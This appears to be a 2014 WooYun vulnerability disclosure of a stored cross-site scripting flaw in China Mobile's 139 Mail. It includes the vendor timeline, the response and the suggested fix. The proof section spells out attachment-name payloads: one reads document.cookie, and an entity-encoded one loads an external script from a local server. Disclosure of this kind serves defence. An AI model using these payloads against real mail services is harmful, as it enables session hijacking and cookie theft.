139邮箱存储型跨站可加载本地恶意脚本

漏洞概要

缺陷编号:WooYun-2014-053394

漏洞标题:139邮箱存储型跨站可加载本地恶意脚本

相关厂商:中国移动139邮箱

漏洞作者:dilcon

提交时间:2014-03-14 10:59

公开时间:2014-04-26 11:01

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2014-03-14: 细节已通知厂商并且等待厂商处理中
2014-03-18: 厂商已经确认,细节仅向厂商公开
2014-03-28: 细节向核心白帽子及相关领域专家公开
2014-04-07: 细节向普通白帽子公开
2014-04-17: 细节向实习白帽子公开
2014-04-26: 细节向公众公开

简要描述:

139邮箱对邮件内容过滤不严格,导致可以加载本地服务器脚本,执行任意javascript代码。

详细说明:

139邮箱处理附件名字段时,遗漏对特殊字符的有效过滤,导致可以截断标签属性值,插入恶意事件并执行任意javascript代码

漏洞证明:

1、发送邮件到139邮箱,邮件附件名改为:hlespayload.jpg'onmouseover=alert(document.cookie) .jpg2、打开邮件,当收件人预览或下载附件时,漏洞触发,效果如下图:

3、使用firebug查看源代码:

4、修改onerror属性,加载本地服务器脚本:hlespayload.jpg' onmouseover=&#100&#61&#100&#111&#99&#117&#109&#101&#110&#116&#59&#101&#61&#100&#46&#99&#114&#101&#97&#116&#101&#69&#108&#101&#109&#101&#110&#116&#40&#39&#115&#99&#114&#105&#112&#116&#39&#41&#59&#101&#46&#115&#114&#99&#61&#39&#104&#116&#116&#112&#58&#47&#47&#49&#50&#55&#46&#48&#46&#48&#46&#49&#47&#105&#46&#106&#115&#39&#59&#100&#46&#98&#111&#100&#121&#46&#97&#112&#112&#101&#110&#100&#67&#104&#105&#108&#100&#40&#101&#41&#59 .jpg(由于邮箱对'/'进行了过滤,此处需要进行一下编码转换)。

修复方案:

对附件名字段的特殊字符进行严格过滤

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-1810:12

厂商回复:

CNVD确认所述漏洞情况,已经转由CNCERT直接通报给中国移动集团公司。跨站在邮件系统是较为普遍且存在威胁的,根据触发条件,rank 10。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 超威蓝猫 白帽子 | Rank:1048 漏洞数:98)

    我挖了几个月没挖出来

  2. 2010-01-01 00:00 职业打酱油 白帽子 | Rank:0 漏洞数:1)

    猫哥都关注了,不会是传说中的mxss吧,关注中 呵呵